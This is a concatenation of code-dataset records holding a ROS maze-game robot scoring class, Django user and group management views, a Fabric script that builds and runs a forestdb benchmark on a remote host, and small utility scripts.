Defaulting to .2!\", self.name)\n self.goal_tolerance = .2\n\n self.disparity = []\n self.goalArivalTimestamps = []\n\n def submitScores(self, req, res):\n self.callSubmitScoresService()\n return True\n\n def newGoalCallback(self):\n pass\n\n def resetRobot(self):\n self.started = False\n self.curState = RobotState.IDLE\n self.pointDex = 0\n self.health = 100000\n self.distance = 0.0\n self.oldDistance = 0.0\n self.curGoal = self.model.expectedPoints.at(0)\n self.disparity.x = []\n self.goalArivalTimestamps = []\n self.healthAtGoal = []\n\n def setState(self, state):\n self.curState = state\n\n def getCurState(self):\n return self.curState\n\n def isStarted(self):\n return self.started\n\n def setGameModel(self, modelVar):\n self.model = modelVar\n\n def getName(self):\n return self.name\n\n def addDispPoint(self, point):\n self.disparity.append(point)\n\n def getAverageDisp(self, returned):\n for i in range(len(self.disparity)):\n returned[i] += self.disparity[i].z\n return returned\n\n def getStartTime(self):\n if self.curState == RobotState.RUNNING_MAZE:\n if not len(self.goalArivalTimestamps) == 0:\n return rospy.Time(self.goalArivalTimestamps[0])\n else:\n return rospy.Time(-1.0)\n\n\n def getRunDuration(self):\n if self.curState == RobotState.RUNNING_MAZE:\n if not self.goalArivalTimestamps == 0:\n return rospy.Duration(self.goalArivalTimestamps[len(self.goalArivalTimestamps) - 1] - self.goalArivalTimestamps[0])\n else:\n return rospy.Duration(-1.0)\n\n\n def callback(self, pointRec, timeRec):\n # geometry_msgs::Point toAdd #The disparity point to add to the list of disparity points in self.dispPoints\n target = self.model.getExpPointAt(self.pointDex)\n #Record goal input delay\n #ros::Duration inputDelay = self.arivedAtLastGoal - msg->header.stamp\n delay = rospy.Duration(self.arivedAtLastGoal - timeRec)\n self.inputDelay.append(delay.to_sec())\n rospy.loginfo(\"Goal input delay was %.6f\", rospy.Duration(delay.to_sec()))\n # Add this point to givenPoints and add the expected point to expectePoints\n # self.givenPoints.append(msg->pose.position)\n self.givenPoints.append(pointRec)\n self.expectedPoints.append(target)\n # std::cout << \"exp point from model x: \" << exp.x << \" y: \" << exp.y << \" z:\" << exp.z << '\\n'\n # Store the disparity data in toAdd\n # toAdd.x = fabs(self.curGoal.x - msg->pose.position.x)\n # toAdd.y = fabs(self.curGoal.y - msg->pose.position.y)\n toAdd = Point()\n toAdd.x = abs(target.x - pointRec.x)\n toAdd.y = abs(target.y - pointRec.y)\n toAdd.z = abs(pow(toAdd.x, 2.0) + pow(toAdd.y, 2.0))\n #Perform evaluation of the user's input using the \"trust\" function\n trustValue = (toAdd.z + ((10000.0 - self.health)/ 10000.0) - (10.0 * delay.toSec()))\n self.trustScores.append(trustValue)\n rospy.loginfo(\"Calculated trust: %.6f\\n\\td = %.6f\\n\\th = %6.f\\n\\ttd = %.6f\", trustValue, toAdd.z, ((10000.0 - self.health)/ 10000.0), (10.0 * delay.toSec()))\n # rospy.loginfo(\"Expected (%.6f, %.6f) got (%.6f, %.6f)\", self.curGoal.x, self.curGoal.y, msg->pose.position.x, msg->pose.position.y)\n rospy.loginfo(\"Expected (%.6f, %.6f) got (%.6f, %.6f)\", target.x, target.y, pointRec.x, pointRec.y)\n rospy.loginfo(\"Calculated Disparity: x: %.6f, y: %.6f, total: %.6f\\n\", toAdd.x, toAdd.y, toAdd.z)\n self.addDispPoint(toAdd)\n avgDisp = 0.\n for i in range(len(self.disparity)):\n avgDisp += self.disparity[i].z\n rospy.loginfo(\"Average disparity so far: %.6f\\n\", avgDisp)\n\n def getDistanceToMazeWalls(self, i, p3transform):\n p1 = Point()\n p2 = Point()\n p3 = 
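Point()\n        # Worked example of the formula below: with p1=(0,0), p2=(4,0) and p3=(2,3),\n        # numerator = |0*2 - 4*3 + 0 - 0| = 12, denominator = sqrt(16) = 4, so the\n        # distance to the segment is 3.0.\n        p3 = 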
Point()\n # distance, numerator, denominator\n if i <= 0:\n i = 1\n elif i >= len(self.model.expectedPoints):\n i = len(self.model.expectedPoints) - 1\n\n p1 = self.model.getExpPointAt(i - 1)\n p2 = self.model.getExpPointAt(i)\n\n p3.x = p3transform.pose.position.x\n p3.y = p3transform.pose.position.y\n p3.z = p3transform.pose.position.z\n\n #ensure that we are able to compute the distance to the line segment\n if p1.x == p2.x:\n if p3.y < min(p1.y, p2.y) or p3.y > max(p1.y, p2.y):\n return -1.0\n else:\n if p3.x < min(p1.x, p2.x) or p3.x > max(p1.x, p2.x):\n return -1.0\n\n #Formulas\n # distance = |(y2 - y1)p3.x - (x2 - x1)p3.y + x2*y1 - x1*y2| / sqrt( (y2 - y1)^2 + (x2 - y1)^2)\n #distance = ( fabs( (p2.y - p1.y) * p3.getOrigin().x() - (p2.x - p1.x) * p3.getOrigin().y() + p2.x*p1.y - p2.y*p1.x ) / sqrt( pow(p2.y - p1.y, 2.0) + pow(p2.x - p1.x, 2.0) ) )\n\n numerator = abs( (p2.y - p1.y) * p3.x - (p2.x - p1.x) * p3.y + p2.x*p1.y - p2.y*p1.x)\n denominator = math.sqrt(pow(p2.y - p1.y, 2.0) + pow(p2.x - p1.x, 2.0) )\n distance = numerator / denominator\n return distance\n\n def checkDistance(self):\n\n #See if the Robot is in the IDLE state, and do nothing if it is\n if self.curState == RobotState.IDLE:\n return\n\n # geometry_msgs::PoseStamped pBase, pMap\n pBase = PoseStamped()\n pMap = PoseStamped()\n pBase.header.frame_id = self.name + \"/base_link\"\n pBase.pose.position.x = 0.0\n pBase.pose.position.y = 0.0\n pBase.pose.orientation = Quaternion(*quaternion_from_euler(0., 0., 0., \"sxyz\"))# createQuaternionMsgFromYaw(0.0)\n\n # tf::TransformListener tfListener\n current_transform = rospy.Time.now()\n\n try:\n TransformListener.waitForTransform(pBase.header.frame_id, \"/map\", rospy.Time(), rospy.Duration(10.0))\n TransformListener.getLatestCommonTime(pBase.header.frame_id, \"/map\", current_transform, None)\n pBase.header.stamp = current_transform\n #transform the robot's pose, pBase, into the map frame, pMap. 
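\n            # Note: tf.TransformListener's waitForTransform / getLatestCommonTime /\n            # transformPose are instance methods in rospy; calling them on the class,\n            # as this block does, fails at runtime. A listener instance is presumably\n            # intended here. After the transform, 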
pMap will contain these coordinates\n            #according to the TF data available at time \"current_transform\"\n            TransformListener.transformPose(\"/map\", pBase, pMap)\n        except tf.Exception as e:\n            rospy.logerr(\"%s\", e)\n            rospy.sleep(1.0)\n\n        distance = self.getDistanceToMazeWalls(self.pointDex, pMap)\n\n        if distance >= self.oldDistance:\n            self.oldDistance = distance\n\n        # Only perform the distance penalty check if the robot is actually running the maze\n        if distance > self.goal_tolerance and self.curState == RobotState.RUNNING_MAZE:\n            self.health -= 1\n            rospy.loginfo(\"%s: Ouch!\\n\\tHealth: %i\\n\\tDistance: %.6f\\n\", self.name, self.health, distance)\n\n        # See if we have reached the next goal\n        rospy.loginfo(\"%s is %.6f from goal x: %.3f, y: %.3f, z: %.3f\", self.name, math.sqrt(pow(self.curGoal.x - pMap.pose.position.x, 2.0) + pow(self.curGoal.y - pMap.pose.position.y, 2.0)), self.curGoal.x, self.curGoal.y, self.curGoal.z)\n\n        if math.sqrt(pow(self.curGoal.x - pMap.pose.position.x, 2.0) + pow(self.curGoal.y - pMap.pose.position.y, 2.0)) <= self.goal_tolerance:\n            self.arivedAtLastGoal = rospy.Time.now()\n\n            rospy.loginfo(\"%s has reached goal at pointDex = %i\", self.name, self.pointDex)\n            self.pointDex += 1\n            rospy.loginfo(\"%s's pointDex is now: %i\", self.name, self.pointDex)\n            # rospy.loginfo(\"PointDex: %i\\n\", pointDex)\n\n            # Have we finished the maze?\n            if self.pointDex == len(self.model.expectedPoints):\n                rospy.loginfo(\"%s completed the maze!\", self.name)\n                self.curState = RobotState.FINISHED_MAZE\n                self.started = False\n\n                # Submit our scores\n                self.callSubmitScoresService()\n                return\n\n            # Get the next goal from the model and save the status information for the goal we have just arrived at\n            self.curGoal = self.model.getExpPointAt(self.pointDex)\n            self.oldDistance = 0.\n            self.goalArivalTimestamps.append(rospy.Time.now().to_sec())\n            self.healthAtGoal.append(self.health)\n\n    def callSubmitScoresService(self):\n        #\tros::ServiceClient client = self.public_nh.serviceClient(\"submit_score\")\n\n        #\tmaze_game::SubmitScores::Request req\n        #\treq.robot_name = self.name\n        #\treq.goal_arival_times = self.goalArivalTimestamps\n        #\treq.damage_at_goal = self.healthAtGoal\n\n        #\tmaze_game::SubmitScores::Response res\n\n        lengths = [len(self.healthAtGoal), len(self.givenPoints), len(self.expectedPoints), len(self.inputDelay), len(self.trustScores)]\n\n        for i in range(len(lengths)):\n            rospy.loginfo(\"lengths @ %i: %i\", i, lengths[i])\n\n        maxLength = max(lengths)\n        rospy.loginfo(\"maxLength: %i\", maxLength)\n\n        # Pad every score list to maxLength with sentinel values so the service\n        # request fields all line up.\n        if len(self.goalArivalTimestamps) < maxLength:\n            rospy.loginfo(\"goalArivalTimestamps size: %i. Resizing...\", len(self.goalArivalTimestamps))\n            for i in range(len(self.goalArivalTimestamps), maxLength):\n                self.goalArivalTimestamps.append(-86401.0)  # -(24 * 60 * 60 + 1)\n\n        if len(self.healthAtGoal) < maxLength:\n            rospy.loginfo(\"healthAtGoal size: %i. Resizing...\", len(self.healthAtGoal))\n            for i in range(len(self.healthAtGoal), maxLength):\n                self.healthAtGoal.append(-(sys.maxint - 1))\n\n        nullPoint = Point()\n        nullPoint.x = -86401.0\n        nullPoint.y = -86401.0\n        nullPoint.z = -86401.0\n\n        if len(self.givenPoints) < maxLength:\n            rospy.loginfo(\"givenPoints size: %i. Resizing...\", len(self.givenPoints))\n            for i in range(len(self.givenPoints), maxLength):\n                self.givenPoints.append(nullPoint)\n\n        if len(self.expectedPoints) < maxLength:\n            rospy.loginfo(\"expectedPoints size: %i. 
Resizing...\", len(self.expectedPoints))\n            for i in range(len(self.expectedPoints), maxLength):\n                self.expectedPoints.append(nullPoint)\n\n        if len(self.inputDelay) < maxLength:\n            rospy.loginfo(\"inputDelay size: %i. Resizing...\", len(self.inputDelay))\n            for i in range(len(self.inputDelay), maxLength):\n                self.inputDelay.append(-86401.0)\n\n        if len(self.trustScores) < maxLength:\n            rospy.loginfo(\"trustScores size: %i. Resizing...\", len(self.trustScores))\n            for i in range(len(self.trustScores), maxLength):\n                self.trustScores.append(-86401.0)\n\n        self.model.submitAndUpdateAverageScores(self.name, self.goalArivalTimestamps, self.healthAtGoal, self.givenPoints, self.expectedPoints, self.inputDelay, self.trustScores)\n\n    def newGoalCallback(self, msg, pointDex):\n        self.callback(msg.pose.position, msg.header.stamp)\n        self.checkDistance()\n\ndef make_robot(name, modelPtr):\n    return Robot(name, modelPtr)\n","sub_path":"ROS_Packages/src/maze_test/maze_game/scripts/Robot.py","file_name":"Robot.py","file_ext":"py","file_size_in_byte":16817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"614157252","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.db import IntegrityError\nfrom django.db.models import Q\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import *\nfrom django.template import Context\nfrom DonkeyBase import methods\nfrom DonkeyBase.forms import SearchForm\nfrom DonkeyBase.methods import OwnPermission\nfrom benutzerverwaltung.models import *\n\nMODEL_STRING_USER = 'Benutzer'\nMODEL_STRING_GRUPPE = 'Gruppe'\n\n# Create your views here\ndef loginView(request):\n    \"\"\"\n    shows a login page for the user.\n\n    :param request: request\n    :return:\n    If the password is wrong or the user is inactive, he is redirected back to the login.\n    If the user passes the login, he is redirected to the index.\n    \"\"\"\n    if not request.user.is_authenticated():\n        if request.method == 'POST':\n            username = request.POST['username']\n            password = request.POST['password']\n            user = authenticate(username=username, password=password)\n            if user is not None:\n                if user.is_active:\n                    login(request, user)\n                    # Redirect to a success page.\n                    return render(request, 'index.html')\n                else:\n                    # Return a 'disabled account' error message\n                    return HttpResponseRedirect('/benutzerverwaltung/loginFault')\n            else:\n                # Return an 'invalid login' error message.\n                invalid = \"Der Benutzername und das Passwort passen nicht zusammen\"\n                c = {'invalid': invalid}\n                return render(request, 'benutzerverwaltung/login.html', c)\n        else:\n            return render(request, 'benutzerverwaltung/login.html')\n    else:\n        return render(request, 'index.html')\n\ndef logoutView(request):\n    \"\"\"\n    Log the active user out\n    :param request: current request\n    :return: redirect to the login\n    \"\"\"\n    logout(request)\n    return HttpResponseRedirect('/')\n\n@login_required(login_url='/')\ndef editPw(request):\n    \"\"\"\n    shows the edit password form\n\n    :param request: current request\n    :return: rendered site (in the context there is True or False)\n    \"\"\"\n    samePW = \"\"\n    if request.method == 'POST':\n        user = request.user\n        pwOne = request.POST['pwOne']\n        pwTwo = request.POST['pwTwo']\n        if user.is_authenticated():\n            if checkPassword(pwOne, pwTwo):\n                user.set_password(pwOne)\n                
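# Django's set_password() only hashes the new value in memory; the save()\n                # call below is what actually persists it.\n                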
user.save()\n samePW = True\n else:\n samePW = False\n contex = Context({'samePW': samePW})\n return render(request, 'benutzerverwaltung/editPasswort.html', contex)\n\n@login_required(login_url='/')\ndef editOwnUser(request):\n \"\"\"\n shows the userform for the logged in user to edit his own profile\n :param request: current request\n :return: rendered site (benutzerverwaltung/editOwnUser.html)\n \"\"\"\n if request.method == 'POST':\n username = request.POST['username']\n lastname = request.POST['lastName']\n firstname = request.POST['firstName']\n email = request.POST['mail']\n user = request.user\n user.first_name = firstname\n user.last_name = lastname\n user.username = username\n user.email = email\n user.save()\n\n return render(request, 'benutzerverwaltung/editOwnUser.html')\n\n@login_required(login_url='/')\ndef showUser(request):\n \"\"\"\n shows all user with a search box.\n (checks automatically if the user got permissions to see the users)\n :param request: current request\n :return:\n rendered site (benutzerverwaltung/showUser.html) with a context (objects, search)\n if the user didnt got the permission to see the users, this returns an error page\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um alle Benutzer zu sehen'\n permission = OwnPermission.can_read(request, MODEL_STRING_USER)\n if permission:\n allUser = User.objects.all()\n search = SearchForm()\n contex = Context({'allUser':allUser, 'search':search})\n if request.method == 'POST':\n suche = request.POST['search']\n objects = User.objects.all().filter(Q(username__icontains=suche)| Q(last_name__icontains=suche) | Q(first_name__icontains=suche))\n search = SearchForm()\n contex = Context({'allUser':objects, 'search': search})\n return render(request, 'benutzerverwaltung/showUser.html', contex)\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\n@login_required(login_url='/')\ndef deleteUser(request, id):\n \"\"\"\n deletes a user\n (checks automatically if the user got permissions to delete the users)\n :param request: current request\n :param id: the id of the user\n :return: rendered site (noPermission.html)\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um einen Benutzer zu loeschen'\n permission = OwnPermission.can_edit(request, MODEL_STRING_USER)\n if permission:\n userID = get_object_or_404(User, pk=id).delete()\n return HttpResponseRedirect('/benutzerverwaltung/showUser')\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\n@login_required(login_url='/')\ndef editUser(request, id):\n \"\"\"\n shows a user form for edit the user and saves it\n :param request: current request\n :param id:the id of the user\n :return: redirect to site benutzerverwaltung/showUser\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um einen Benutzer zu bearbeiten'\n permission = OwnPermission.can_edit(request, MODEL_STRING_USER)\n if permission:\n userID = get_object_or_404(User, pk=id)\n contex = Context({'benutzer':userID})\n if request.method == 'POST':\n username = request.POST['username']\n email = request.POST['mail']\n lastName = request.POST['lastName']\n firstName = request.POST['firstName']\n superUser = request.POST.getlist('isAdmin')\n userID.username = username\n userID.email = email\n userID.last_name = lastName\n userID.first_name = firstName\n userID.is_staff = False\n for sUser in superUser:\n if sUser == 'on':\n userID.is_staff = True\n userID.save()\n 
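# Browsers submit 'on' for a ticked checkbox, so is_staff is re-enabled above\n            # only when the isAdmin box was checked.\n            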
return HttpResponseRedirect('/benutzerverwaltung/showUser')\n return render(request, 'benutzerverwaltung/editUser.html', contex)\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\n@login_required(login_url='/')\ndef addUser(request):\n \"\"\"\n shows a user form for adding users, validate and saves it\n\n :param request: current request\n :return: rendered site (benutzerverwaltung/createUser.html)\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um einen Benutzer zu bearbeiten'\n permission = OwnPermission.can_write(request, MODEL_STRING_USER)\n if permission:\n if request.method == 'POST':\n userForm = UserCreationForm(data=request.POST)\n allUser = User.objects.all()\n search = SearchForm()\n if userForm.is_valid():\n userForm.save()\n context = {'allUser':allUser, 'search':search}\n return render(request, 'benutzerverwaltung/showUser.html', context)\n else:\n userForm = UserCreationForm()\n c = {'form':userForm}\n return render(request, 'benutzerverwaltung/createUser.html', c)\n else:\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\ndef checkPassword(pwOne, pwTwo):\n \"\"\"\n checks 2 given string if they are the same\n :param pwOne: string\n :param pwTwo: string\n :return: true if they are the same, false if not\n \"\"\"\n if pwOne == pwTwo:\n return True\n else:\n return False\n\n@login_required(login_url='/')\ndef showGruppe(request):\n \"\"\"\n shows all groups\n\n :param request: current\n :return:rendered site (benutzerverwaltung/showGruppe.html)\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um alle Gruppen zu sehen'\n permission = OwnPermission.can_read(request, MODEL_STRING_GRUPPE)\n if permission:\n gruppe = Gruppe.objects.all()\n contex = Context({'gruppe':gruppe})\n return render(request, 'benutzerverwaltung/showGruppe.html', contex)\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\n@login_required(login_url='/')\ndef deleteGruppe(request, grpID):\n \"\"\"\n deletes a group\n\n :param request: current request\n :param grpID: id of the grpID\n :return: redirect to /benutzerverwaltung/showGruppe/\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um alle Gruppen zu sehen'\n permission = OwnPermission.can_read(request, MODEL_STRING_GRUPPE)\n if permission:\n get_object_or_404(Gruppe, pk=grpID).delete()\n return HttpResponseRedirect('/benutzerverwaltung/showGruppe/')\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\n@login_required(login_url='/')\ndef addGruppe(request):\n \"\"\"\n shows a form for adding a group, validate and saves it\n :param request: current request\n :return: redirect to /benutzerverwaltung/editGruppe/\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um eine Gruppe hinzuzufuegen'\n permission = OwnPermission.can_write(request, MODEL_STRING_GRUPPE)\n if permission:\n if request.method == 'POST':\n name = request.POST['name']\n try:\n Gruppe(name=name).save()\n except IntegrityError:\n return methods.ohohError(request, \"Diese Gruppe existiert bereits\", \"/benutzerverwaltung/createGruppe\")\n newGroup = Gruppe.objects.get(name=name)\n grpID = newGroup.grpID\n return HttpResponseRedirect('/benutzerverwaltung/editGruppe/'+str(grpID))\n return render(request, 'benutzerverwaltung/createGruppe.html')\n context = {'permission_message': PERMISSION_MESSAGE}\n return 
render(request, 'noPermission.html', context)\n\n@login_required(login_url='/')\ndef editGruppe(request, grpID):\n \"\"\"\n shows a form for edit a group and saves it\n :param request: current request\n :param grpID: the group id\n :return: redirect to /benutzerverwaltung/showGruppe/\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um eine Gruppen zu bearbeiten'\n permission = OwnPermission.can_edit(request, MODEL_STRING_GRUPPE)\n if permission:\n gruppe_ID = get_object_or_404(Gruppe, pk=grpID)\n gruppe = Gruppe.objects.all()\n userInGrp = []\n permInGrp = []\n\n for x in gruppe_ID.bnID.all():\n userInGrp.append(x.username)\n\n user_not_in = User.objects.exclude(username__in=userInGrp)\n\n for y in gruppe_ID.tbID.all():\n permInGrp.append(y.bezeichnung)\n\n perm_not_in = Tabelle_Berechtigung.objects.exclude(bezeichnung__in=permInGrp)\n\n if request.method == 'POST':\n gruppenName = request.POST['name']\n gruppe_ID.name = gruppenName\n gruppe_ID.save()\n peopleInGroup = request.POST.getlist('inGroup[]')\n peopleNotInGroup = request.POST.getlist('notInGroup[]')\n permissionNotInGroup = request.POST.getlist('permNotIn[]')\n permissionInGroup = request.POST.getlist('permIn[]')\n\n for pplNotInG in peopleNotInGroup:\n gruppe_ID.bnID.remove(User.objects.get(username=pplNotInG))\n\n for pplInG in peopleInGroup:\n gruppe_ID.bnID.add(User.objects.get(username=pplInG))\n\n for permInG in permissionInGroup:\n gruppe_ID.tbID.add(Tabelle_Berechtigung.objects.get(bezeichnung=permInG))\n\n for permNotInG in permissionNotInGroup:\n gruppe_ID.tbID.remove(Tabelle_Berechtigung.objects.get(bezeichnung=permNotInG))\n\n return HttpResponseRedirect('/benutzerverwaltung/showGruppe')\n\n contex = Context({'gruppe':gruppe, 'gruppe_ID':gruppe_ID, 'user_not_in': user_not_in, 'perm_not_in':perm_not_in})\n return render(request, 'benutzerverwaltung/editGruppe.html', contex)\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\n@login_required(login_url='/')\ndef showRight(request):\n \"\"\"\n shows the groups and their rights\n :param request: current request\n :return: rendered site (benutzerverwaltung/userRight.html)\n \"\"\"\n activeUser = request.user\n groups = Gruppe.objects.all()\n userInGroup = []\n\n for group in groups:\n if group.name != \"Administrator\":\n for user in group.bnID.all():\n if activeUser == user:\n userInGroup.append((group.name, [perm.bezeichnung for perm in group.tbID.all()]))\n context = {'userInGroup':userInGroup}\n return render(request, 'benutzerverwaltung/userRight.html', context)","sub_path":"DonkeyBase/benutzerverwaltung/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"488232846","text":"import argparse\nimport fabric\nimport logging\nimport pprint\nimport requests\nimport urllib2\nimport urlparse\nimport xmltodict\n\nfrom fabric.api import run, hosts, env, execute, shell_env\nfrom fabric.context_managers import cd\nfrom logger import logger\nfrom StringIO import StringIO\n\nargs = None\nprog_name = \"forestdb_standalone_test\"\n\n\ndef iter_urls():\n SHERLOCK_BUILDS = (\n 'http://latestbuilds.hq.couchbase.com/couchbase-server/sherlock/{edition}/')\n\n WATSON_BUILDS = (\n 'http://172.23.120.24/builds/latestbuilds/couchbase-server/watson/{edition}/')\n\n search_bases = [SHERLOCK_BUILDS, WATSON_BUILDS]\n\n patterns = [\n 'couchbase-server-{release}-{edition}-manifest.xml'\n ]\n\n for 
base in search_bases:\n for pat in patterns:\n url = urlparse.urljoin(\n base.format(**(args.__dict__)), pat.format(**(args.__dict__)))\n yield url\n\n\ndef find_manifest():\n for url in iter_urls():\n try:\n logger.debug(\"Trying {}\".format(url))\n status_code = requests.head(url).status_code\n except ConnectionError:\n continue\n else:\n if status_code == 200:\n logger.info('Found \"{}\"'.format(url))\n return url\n logger.interrupt(\"Cannot find the manifest for given version\")\n\n\ndef fetch_url(xml_url):\n file = urllib2.urlopen(xml_url)\n data = file.read()\n file.close()\n xml_data = xmltodict.parse(data)\n return xml_data\n\n\ndef hash_from_xml(xml_data):\n found = filter(\n lambda tup: tup['@name'] == 'forestdb',\n xml_data['manifest']['project'])[0]\n logger.info(\"Found revision {}\".format(found))\n branch = found.get('@upstream', 'master')\n fdb_hash = found['@revision']\n logger.info(\"Using branch {} hash {}\".format(branch, fdb_hash))\n return branch, fdb_hash\n\n\ndef clone_repo(repo):\n CLONE_TIMEOUT = 60\n cmd = \"git clone {}\".format(repo)\n logger.info(\"Running {}\".format(cmd))\n try:\n run(cmd, pty=False, timeout=CLONE_TIMEOUT)\n except fabric.exceptions.CommandTimeout:\n logger.interrupt(\n \"Failed to clone forestdb under {} seconds\".format(\n CLONE_TIMEOUT))\n\n\ndef compile_forestdb(branch, fdb_hash):\n with cd(args.remote_workdir):\n clone_repo(\"https://github.com/couchbase/forestdb.git\")\n with cd(\"forestdb\"):\n # if not master, move to that branch.\n if branch != \"master\":\n run(\"git checkout -b {0} origin/{0}\".format(branch))\n run(\"git reset --hard {}\".format(fdb_hash))\n logger.warn(\"Patching CMakeLists.txt to use c++0x instead of c++11\")\n run(\"sed -i 's/c++11/c++0x/' CMakeLists.txt\")\n run(\"mkdir build\")\n with cd(\"build\"):\n run(\"cmake ../\")\n run(\"make all\")\n run(\"ls *so\")\n fdb_path = \"{}/forestdb/build/libforestdb.so\".format(args.remote_workdir)\n run(\"ls {}\".format(fdb_path))\n return fdb_path\n\n\ndef compile_standalone_test(fdb_path):\n with cd(args.remote_workdir):\n clone_repo(\"https://github.com/uvenum/forestdb-2ibenchmark.git\")\n with cd(\"forestdb-2ibenchmark\"):\n bench_dir = \"{}/forestdb-2ibenchmark\".format(args.remote_workdir)\n fdb_dir = \"{}/forestdb\".format(args.remote_workdir)\n cmd = \"g++ -o {} -Werror\".format(prog_name)\n cmd += \" -I{0} -I{0}/utils -I{1}/include/\".format(bench_dir, fdb_dir)\n cmd += \" -L{}/build\".format(fdb_dir)\n cmd += \" forestdb_workload.cc strgen.cc utils/iniparser.cc\"\n cmd += \" -lforestdb -lpthread\"\n run(cmd)\n run(\"mv {} ../\".format(prog_name))\n run(\"cp bench_config.ini ../\")\n\n\ndef run_standalone_test():\n run(\"service couchbase-server stop\", warn_only=True)\n with shell_env(LD_LIBRARY_PATH=\"{}/forestdb/build\".format(args.remote_workdir)):\n with cd(args.remote_workdir):\n run(\"mkdir data\")\n run(\"ldd ./{}\".format(prog_name))\n run(\"./{}\".format(prog_name))\n\n\ndef cleanup_remote_workdir():\n run(\"mkdir -p {}\".format(args.remote_workdir))\n run(\"rm -rf {}\".format(args.remote_workdir))\n run(\"mkdir -p {}\".format(args.remote_workdir))\n\n\ndef main():\n xml_url = find_manifest()\n xml_data = fetch_url(xml_url)\n branch, fdb_hash = hash_from_xml(xml_data)\n\n execute(cleanup_remote_workdir)\n fdb_path = execute(compile_forestdb, branch, fdb_hash)\n execute(compile_standalone_test, fdb_path)\n execute(run_standalone_test)\n\n\ndef get_args():\n global args\n parser = argparse.ArgumentParser(\n description='forestdb stand alone test'\n ' that 
intends to mimic secondary workload')\n\n parser.add_argument('--version', dest=\"version\", required=True)\n parser.add_argument('--host', dest=\"host\", required=True)\n parser.add_argument('--remote_workdir', dest=\"remote_workdir\", default=\"/tmp/standalone_forestdb\")\n\n args = parser.parse_args()\n\n (args.release, args.edition) = args.version.split('-')\n\n env.hosts = [args.host]\n env.user = \"root\"\n env.password = \"couchbase\"\n\n# logger.setLevel(logging.DEBUG)\n# logger.handlers[0].setLevel(logging.DEBUG)\n\nif __name__ == \"__main__\":\n get_args()\n main()\n","sub_path":"standalone_tests/forestdb_secondary/forestdb_secondary_test.py","file_name":"forestdb_secondary_test.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"265869827","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import patterns, url\n\nurlpatterns = patterns(\n 'Instanssi.admin_utils.views',\n url(r'^$', 'index', name=\"index\"),\n url(r'^diskcleaner/', 'diskcleaner', name=\"diskcleaner\"),\n url(r'^dbchecker/', 'dbchecker', name=\"dbchecker\"),\n)","sub_path":"Instanssi/admin_utils/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"601108004","text":"import sys\n# usage\n# python3 CreateNGrams.py InputFileName OutputFileName\n\n#pylint: disable=E1101\n# reading data from file\nprint(\"\\n\\033[1;37m\")\n\ninputFile = None\noutputFile = None\n\ntry:\n inputFile = sys.argv[1]\n outputFile = sys.argv[2]\nexcept:\n print(\"\\nInput File Command is Not Correct\")\n sys.exit()\n\nwith open(inputFile, \"r\", encoding='utf-8') as sourceDoc:\n data = sourceDoc.readlines()\n\n\ndef CreateNGram(tokens, limit):\n tempLimit = limit\n ngram = \"\"\n i = 0\n j = 0\n NewNgram = []\n for i in range(len(tokens)-1):\n for j in range(i, limit):\n ngram += tokens[j] + \" \"\n if j == limit-1:\n NewNgram.append(ngram.strip())\n limit += tempLimit\n ngram = \"\"\n break\n elif (j == len(tokens)-1):\n NewNgram.append(ngram.strip())\n ngram = \"\"\n break\n elif len(ngram.strip().split()) == tempLimit:\n NewNgram.append(ngram.strip())\n ngram = \"\"\n break\n\n return NewNgram\n\n\nprint(\"Creating Phrases...\")\nof = open(outputFile, \"w+\", encoding='utf-8')\ntotalNgram = 0\nfor line in data:\n tokens = line.split()\n ngram = CreateNGram(tokens, 20)\n totalNgram += len(ngram)\n for line in ngram:\n of.write(line+\"\\n\")\n\nprint(\"Total Phrases:\", totalNgram)\nprint(\"\\n\\033[1;32m output is saved in \", outputFile)\n","sub_path":"Solve/ReadData/CreateNGrams.py","file_name":"CreateNGrams.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"581992401","text":"# -*- coding: utf-8 -*-\n__author__ = 'Lvv'\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nfrom FieldGenerator.FieldBase import FieldBase\n\nclass guo_ji_huo_che_piao(FieldBase):\n def __init__(self, datasource, version=1, *args, **kwargs):\n FieldBase.__init__(self, datasource, version)\n self.che_piao_ming = None\n self.chu_piao_fei = None\n self.shi_yong_tian_shu = None\n self.zuo_wei_lei_xing = None\n self.che_piao_lei_xing = None\n self.cheng_ren = None\n self.er_tong = None\n self.qing_nian = None\n self.zhang_zhe = None\n\n def makemap(self):\n return {\n u'车票名': self.che_piao_ming,\n u'出票费': self.chu_piao_fei,\n u'使用天数': 
